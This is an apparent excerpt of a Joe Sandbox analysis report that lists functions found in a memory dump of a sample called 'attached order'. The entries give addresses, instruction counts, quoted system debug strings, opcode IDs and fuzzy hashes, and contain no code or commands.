                                                                                          Function 017C66D0 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #
                                                                                          • API String ID: 0-1885708031
                                                                                          • Opcode ID: 5a3c8ec15ab681edb11146b9816da8d5f283ca0edc133c3c83f2c62c7c26f163
                                                                                          • Instruction ID: dc1c0a074626e8fef154d1a8db63ed101d5d7175115eae5c93ec1d1bc4833cd6
                                                                                          • Opcode Fuzzy Hash: 5a3c8ec15ab681edb11146b9816da8d5f283ca0edc133c3c83f2c62c7c26f163
                                                                                          • Instruction Fuzzy Hash: 2B31E835600619ABEB32DE68C884FAEFBB89F45F14F14446CF940AB382E775E905CB50
                                                                                          Function 017AC6F2 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: BinaryName
                                                                                          • API String ID: 0-215506332
                                                                                          • Opcode ID: c9e453728b52023bcd60ee122e7c4ff9a95e2a3ba30f991af93830899249724d
                                                                                          • Instruction ID: d2581c73e9f90a4adc83f9a17547720a1d599628ee3ad79b0b7a8498ec056276
                                                                                          • Opcode Fuzzy Hash: c9e453728b52023bcd60ee122e7c4ff9a95e2a3ba30f991af93830899249724d
                                                                                          • Instruction Fuzzy Hash: 7631DF7690051ABFEB27DA58C845E7BFFB4EBC0B20F414269E911AB251D7309E00CBA0
                                                                                          Function 017CAA40 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 017CAABF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                          • API String ID: 0-1911121157
                                                                                          • Opcode ID: 8c2e7c84c52feb828fc2b93b1752a5f6341f5cd7f43eb132d263b31bc1d209ff
                                                                                          • Instruction ID: 11deb253bfc643c578af1526b0f910bcd040a4910b8fef2bd5620d9d444769bb
                                                                                          • Opcode Fuzzy Hash: 8c2e7c84c52feb828fc2b93b1752a5f6341f5cd7f43eb132d263b31bc1d209ff
                                                                                          • Instruction Fuzzy Hash: EB3126B2A00608AFDB22DF58CD44F9AFBB5FB44B10F14862DE901A7684D7389900CB90
                                                                                          Function 01758BD1 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: WindowsExcludedProcs
                                                                                          • API String ID: 0-3583428290
                                                                                          • Opcode ID: 28ec05bb75e60007dc76649bfeece563ac1f16d6a5e27de73284d7176d7d3b6d
                                                                                          • Instruction ID: f2fe6e74e8ecc513274bb6d551a4255135f43d95bc129b67783e97ef9dbc21a4
                                                                                          • Opcode Fuzzy Hash: 28ec05bb75e60007dc76649bfeece563ac1f16d6a5e27de73284d7176d7d3b6d
                                                                                          • Instruction Fuzzy Hash: B621F537502215BBDF329A9EC884F6BFBBDEF41A90F0500A5AE04DB210C670CD05C7A2
                                                                                          Function 017B85AA Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 017B85DE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                          • API String ID: 0-702105204
                                                                                          • Opcode ID: 7dea63d6b180ffd7925bdfc0afa4c1bec8cc5c6fa48a4aa3ca115db1e8c86a48
                                                                                          • Instruction ID: 690c4b008348fc5d1ebf7b45f42547070d2f3e9471f1e3f683f4337adcd76a52
                                                                                          • Opcode Fuzzy Hash: 7dea63d6b180ffd7925bdfc0afa4c1bec8cc5c6fa48a4aa3ca115db1e8c86a48
                                                                                          • Instruction Fuzzy Hash: 660176726002259BD7326E19D8C8BE6FB6DEF41358F04002DF6025719BCB20AC80CB97
                                                                                          Function 017E6B77 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • Critical error detected %lx, xrefs: 017E6BA7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Critical error detected %lx
                                                                                          • API String ID: 0-802127002
                                                                                          • Opcode ID: 2cb532232b09cd95f60c09b76e070aa4ab1da3fdca7e6af90cbe265a6f2c42e9
                                                                                          • Instruction ID: e68b9138125f8261c7194fad8800bf4ab2fbb45e2d1c479c1f2e6fbd3edd77f6
                                                                                          • Opcode Fuzzy Hash: 2cb532232b09cd95f60c09b76e070aa4ab1da3fdca7e6af90cbe265a6f2c42e9
                                                                                          • Instruction Fuzzy Hash: EC115AB2D443088BDB25DFA8C44ABDDFBF0EB18714F20452AE115AB282D3745601CF00
                                                                                          Function 0177088E Relevance: .6, Instructions: 606COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 5fba9b01550e2030d984a33728ebcacff0c186c1ebec68e62717ddea6973784f
                                                                                          • Instruction ID: 4494b1a60fa660e799c53c27bf84e43df342ea1693f24d732741b0803bca6cb9
                                                                                          • Opcode Fuzzy Hash: 5fba9b01550e2030d984a33728ebcacff0c186c1ebec68e62717ddea6973784f
                                                                                          • Instruction Fuzzy Hash: AC426A75900705DFDB21CF28C884BAABBF5BF49304F1445AAEA59DB245E770AA84CF60
                                                                                          Function 01742760 Relevance: .6, Instructions: 605COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c8934fb928479ae17dad52d3a2eb48f5a3d3a6b24623427360e42d33bf2e7a45
                                                                                          • Instruction ID: 5e8088517703e76727b000f2bdf9a372a8831cff65ffa9220f9daa7ee7e47b4e
                                                                                          • Opcode Fuzzy Hash: c8934fb928479ae17dad52d3a2eb48f5a3d3a6b24623427360e42d33bf2e7a45
                                                                                          • Instruction Fuzzy Hash: BF32FE30A007558FEF25CFA9D8547BEFBF2AF84700F24826DE5469B289D734A949CB50
                                                                                          Function 01736970 Relevance: .5, Instructions: 548COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b231e8d2e85e9636595ac1d5d15ea7144efe009927b9a3428badd055319bcb1d
                                                                                          • Instruction ID: 74ec15f6083f0b6f4e7cf4c446e9227a1a576f1353995dbdaa652288bf60018a
                                                                                          • Opcode Fuzzy Hash: b231e8d2e85e9636595ac1d5d15ea7144efe009927b9a3428badd055319bcb1d
                                                                                          • Instruction Fuzzy Hash: F6329D71A00215DFDB25CF68C880BAAF7F1FF88310F2485A9E955AB392D734AA55CB50
                                                                                          Function 01754955 Relevance: .4, Instructions: 423COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 404bdb3069237242736c87285a47880b8af0925a3db27f9dc6d0c918b918b8ae
                                                                                          • Instruction ID: b076e252a30737a97de81557fe97e5f30a4d154bfe5d406f85328d21c4b2405f
                                                                                          • Opcode Fuzzy Hash: 404bdb3069237242736c87285a47880b8af0925a3db27f9dc6d0c918b918b8ae
                                                                                          • Instruction Fuzzy Hash: 9FF18271E0020A9BDF55CF99E884BAEFBF5AF44300F048129ED16AB344E7B4E881CB50
                                                                                          Function 017C84BB Relevance: .4, Instructions: 386COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2318a7f61b2d6ed8d04a91431c1463f295fcd43aef57a76b3f47004351d564d3
                                                                                          • Instruction ID: 7d48bac6b34fb8ad09ae42f52bc7057ecd3dfa71d7567f1763e9ce04ee20d584
                                                                                          • Opcode Fuzzy Hash: 2318a7f61b2d6ed8d04a91431c1463f295fcd43aef57a76b3f47004351d564d3
                                                                                          • Instruction Fuzzy Hash: 64D1CF71E0060A9BDF15CFA8C841BFEF7F1AF88B04F18816DD955A7241EB39E9058B61
                                                                                          Function 017364F0 Relevance: .4, Instructions: 383COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6de203a66faf84181060d110ac9c0fccb3ac23af30e98174f5e1dd7d791215a9
                                                                                          • Instruction ID: 7935a143a6a9d92c8f30d2eb2312c27b48f65337932b8437766285b26ab74480
                                                                                          • Opcode Fuzzy Hash: 6de203a66faf84181060d110ac9c0fccb3ac23af30e98174f5e1dd7d791215a9
                                                                                          • Instruction Fuzzy Hash: 0CE15971609342DFC715CF28C490A6AFBE1BF89314F148A6DF59987352DB31EA05CB92
                                                                                          Function 01728347 Relevance: .4, Instructions: 380COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 582cbd73a97ac0060b094b644e930d44e46f177d10beaf14147f579cb8b76249
                                                                                          • Instruction ID: 8d75c3352ebe6f13f14db9c5193ca27cb3147b91f6ad45b365db66da75ff7983
                                                                                          • Opcode Fuzzy Hash: 582cbd73a97ac0060b094b644e930d44e46f177d10beaf14147f579cb8b76249
                                                                                          • Instruction Fuzzy Hash: 57D1EE71A002268BDB24DF68C881ABEF7F1FF54304F08416DE916DB285EB35EA46CB51
                                                                                          Function 017C69B0 Relevance: .4, Instructions: 379COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1cee8aded9195749047914fb225ca392fd176670a44d707d741bfc604324d0b2
                                                                                          • Instruction ID: 47a017ce3e298c324d4b48277367d019c7043244dda43092addb5cca548dc9d8
                                                                                          • Opcode Fuzzy Hash: 1cee8aded9195749047914fb225ca392fd176670a44d707d741bfc604324d0b2
                                                                                          • Instruction Fuzzy Hash: 06E13970D002599BCF15CFA9C990AAEFBF5BF49704F14819DE944AB345E335E981CBA0
                                                                                          Function 01740445 Relevance: .3, Instructions: 300COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                                                          • Instruction ID: 87a702627127d4f9ab09fbf8c07ed5fea752c377162ba7693f30dc61a67ed3aa
                                                                                          • Opcode Fuzzy Hash: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
                                                                                          • Instruction Fuzzy Hash: 6EB1E631600646AFDF25CBA8C954BBEFBF6EF89300F140599E6529B285D730ED45CB50
                                                                                          Function 01750D01 Relevance: .3, Instructions: 295COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f5b9c892f977789ab19b5632d751439cc1d6ea04872e0becf64c0e59cfadf63f
                                                                                          • Instruction ID: 71611f180ae3d816a6fadfbcd6a9f621abb21691bc84ee22641bc2a1ccecbec4
                                                                                          • Opcode Fuzzy Hash: f5b9c892f977789ab19b5632d751439cc1d6ea04872e0becf64c0e59cfadf63f
                                                                                          • Instruction Fuzzy Hash: 56C13B70E00319DFDB65DFA9D884AADFBB5FF48304F20412AE905AB245E7B4A985CF50
                                                                                          Function 017382E0 Relevance: .3, Instructions: 281COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ffa0bdab23708af8a8c8ba20414baf0a293dfd1dbcb1b73df5c9bdc73c1da918
                                                                                          • Instruction ID: 330fae3dfa52d42494f6a5e202beb4ac6063b7e0cc1195dbcea6f336e956522c
                                                                                          • Opcode Fuzzy Hash: ffa0bdab23708af8a8c8ba20414baf0a293dfd1dbcb1b73df5c9bdc73c1da918
                                                                                          • Instruction Fuzzy Hash: 3AC147742083818FD764CF19C494BAAF7E5FF88344F44496DE98987691D7B4EA08CF92
                                                                                          Function 0172C3C7 Relevance: .3, Instructions: 280COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 991704f2f2a6e86d1334020527262fc595b4be0a6a3e656e49a43ca6c71a6f08
                                                                                          • Instruction ID: 17b780886ede27eaa1c0ea1881b561db09f04ed2d684043079a68d86d9122458
                                                                                          • Opcode Fuzzy Hash: 991704f2f2a6e86d1334020527262fc595b4be0a6a3e656e49a43ca6c71a6f08
                                                                                          • Instruction Fuzzy Hash: 45B19F70A002658BDB75DF69C880BBDF7F1AF54304F1485EAD50AA7285EB70DE86CB21
                                                                                          Function 0175E507 Relevance: .3, Instructions: 278COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6005d08c9b3172fe1a551190d5362da121ee9ea26a5e00388b4ec224dba04aae
                                                                                          • Instruction ID: 7e966e1047657c3790e56eb3f9d9187d975306425dc7b1e6a844b009e11aa588
                                                                                          • Opcode Fuzzy Hash: 6005d08c9b3172fe1a551190d5362da121ee9ea26a5e00388b4ec224dba04aae
                                                                                          • Instruction Fuzzy Hash: 31A12731E00215AFEF22DBA8D848BADFFA4EB05754F150165EE11EB281DBB49E44CBD1
                                                                                          Function 017700A5 Relevance: .3, Instructions: 276COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 273985fa1e2ddbe3b4f82e0eb4cde8c61adf58ab3bb26206d2dda5870db39915
                                                                                          • Instruction ID: f4c3a7cbea9b9266bde643f9601db92c8e3d87ae7da18c772d53da863ee1032e
                                                                                          • Opcode Fuzzy Hash: 273985fa1e2ddbe3b4f82e0eb4cde8c61adf58ab3bb26206d2dda5870db39915
                                                                                          • Instruction Fuzzy Hash: 39A1CC71B01606DFEF29DF69C980BABF7B1FF45318F504129EA0597282EB34A915CB90
                                                                                          Function 01804080 Relevance: .3, Instructions: 275COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f2ca8c6c27d9980e3e6968595e797709f7bb1583d86929d847cde33feb438988
                                                                                          • Instruction ID: 10c7a50b48819253262cfb3dafcc2a495f630b20b859b1cf3a601b25c2055b1a
                                                                                          • Opcode Fuzzy Hash: f2ca8c6c27d9980e3e6968595e797709f7bb1583d86929d847cde33feb438988
                                                                                          • Instruction Fuzzy Hash: 27A1D972644606AFC762DF28CD84B1ABBE8FF58304F014528E689DB692D374EE51CB90
                                                                                          Function 0174E310 Relevance: .3, Instructions: 261COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c49736373d1e67a134336507377af84ab24891c026247120c796ad60eb832ee4
                                                                                          • Instruction ID: f04d6311e6d3cae8bc66b421cc6a3b92c34e80a8f79981d2b2c0ff1a38731b10
                                                                                          • Opcode Fuzzy Hash: c49736373d1e67a134336507377af84ab24891c026247120c796ad60eb832ee4
                                                                                          • Instruction Fuzzy Hash: F8910231A00615CBEB219B6DD484B7EFBB1FF94724F1540A9FE059B381EB389941CBA1
                                                                                          Function 0178693A Relevance: .2, Instructions: 226COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cc2b8ab043ef9c0a3b5d50a5f4c10c0ee0367822426009b294cf6b1eb3d3c6cd
                                                                                          • Instruction ID: e23f3079f324b26a31693a598996c866cbc7e40998945415a8845e31e086b01e
                                                                                          • Opcode Fuzzy Hash: cc2b8ab043ef9c0a3b5d50a5f4c10c0ee0367822426009b294cf6b1eb3d3c6cd
                                                                                          • Instruction Fuzzy Hash: F7819EB1A0061AABDB14DF69C840ABEFBF9FB48704F14852EF545E7640E734E940CBA4
                                                                                          Function 017FA6C0 Relevance: .2, Instructions: 222COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                                                                          • Instruction ID: 6526d8480f24c896ffbe61b72c2202f628be5a0d57d5e0cde26132579ea64344
                                                                                          • Opcode Fuzzy Hash: b10c7932b254f136361a00da209bd0f1f317ff6b27432d4030294687b97bdc54
                                                                                          • Instruction Fuzzy Hash: DA816035A002069FDF19CF59C884AAEFBF6BF84310F19816DDA1A9B345D774E902CB50
                                                                                          Function 0176E1A4 Relevance: .2, Instructions: 212COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ab58b394e7ef2ae278e4cdae93835b91b3dc9749364c50ecbba6ae31e95c7ffe
                                                                                          • Instruction ID: 8bdad3da04d53272e149e622a57ceec102866313cc124095ffa0265184dcf380
                                                                                          • Opcode Fuzzy Hash: ab58b394e7ef2ae278e4cdae93835b91b3dc9749364c50ecbba6ae31e95c7ffe
                                                                                          • Instruction Fuzzy Hash: 96816E75A00609EFDB16CFA8C880AEEF7FAFF88314F144429E955A7250DB30AD45DB60
                                                                                          Function 0174C560 Relevance: .2, Instructions: 206COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8f15b3554fb8590ffce86a0a6b8e571ee5310b8bc4b77edce0d98fe1c4240e65
                                                                                          • Instruction ID: 59c22dac1452abe0ae20385eb1c96a67ce9e4a5c43847b8121fea2bf64a0aac6
                                                                                          • Opcode Fuzzy Hash: 8f15b3554fb8590ffce86a0a6b8e571ee5310b8bc4b77edce0d98fe1c4240e65
                                                                                          • Instruction Fuzzy Hash: 4F71C2B1D06669DBCB26CF58D8907BDFBB0FF4A710F18815AE942A7340E7349904CBA1
                                                                                          Function 017C88FB Relevance: .2, Instructions: 206COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3e6e8b1d8fa2ff9edcb4a9f414c1eed8080b9300387b73e266e0acd764fd053a
                                                                                          • Instruction ID: 821cf446957ef49ab69af17a12e208b6bb35815108ab37ffb98b15c3cb9e21ad
                                                                                          • Opcode Fuzzy Hash: 3e6e8b1d8fa2ff9edcb4a9f414c1eed8080b9300387b73e266e0acd764fd053a
                                                                                          • Instruction Fuzzy Hash: 4271AC709042569FCB15CF59C440AFEFBF5EF45700B0881ADE998DB202E735EA46CBA2
                                                                                          Function 0174252B Relevance: .2, Instructions: 201COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8aa811dc822713d7d80f35aa77e577a3e59a33f14222187b12b314063a8e1820
                                                                                          • Instruction ID: 822d91489c872414661efccd6703f56d7f00616377a07140c8e30edcd2f98240
                                                                                          • Opcode Fuzzy Hash: 8aa811dc822713d7d80f35aa77e577a3e59a33f14222187b12b314063a8e1820
                                                                                          • Instruction Fuzzy Hash: A171CA316046428FD312DF28D484B2AF7E5FF88700F1485AAF8598B756DB34D995CBA2
                                                                                          Function 017389C0 Relevance: .2, Instructions: 197COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5048bb481a743c55abc81947168f9d4126e315f693141ee9ede06a6d6b90c8ac
                                                                                          • Instruction ID: add1d7e961f5fb206084c4adb6fc33b06eeabc38f8785bb901e89358e8b74942
                                                                                          • Opcode Fuzzy Hash: 5048bb481a743c55abc81947168f9d4126e315f693141ee9ede06a6d6b90c8ac
                                                                                          • Instruction Fuzzy Hash: 1E81B171A04206DFDF25DF5CE584BADFBB2AF84310F154269EA00AB286D7749E41CFA4
                                                                                          Function 017F8BBE Relevance: .2, Instructions: 186COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 38abdb3b90f11933a13416b0c4e2dc1d8d63aa5625fe539fa2cdd06497c221cd
                                                                                          • Instruction ID: b1ece250729139e96f066e45bcf60df23af49bfb24d171e2aa3cdfdc3ee7046d
                                                                                          • Opcode Fuzzy Hash: 38abdb3b90f11933a13416b0c4e2dc1d8d63aa5625fe539fa2cdd06497c221cd
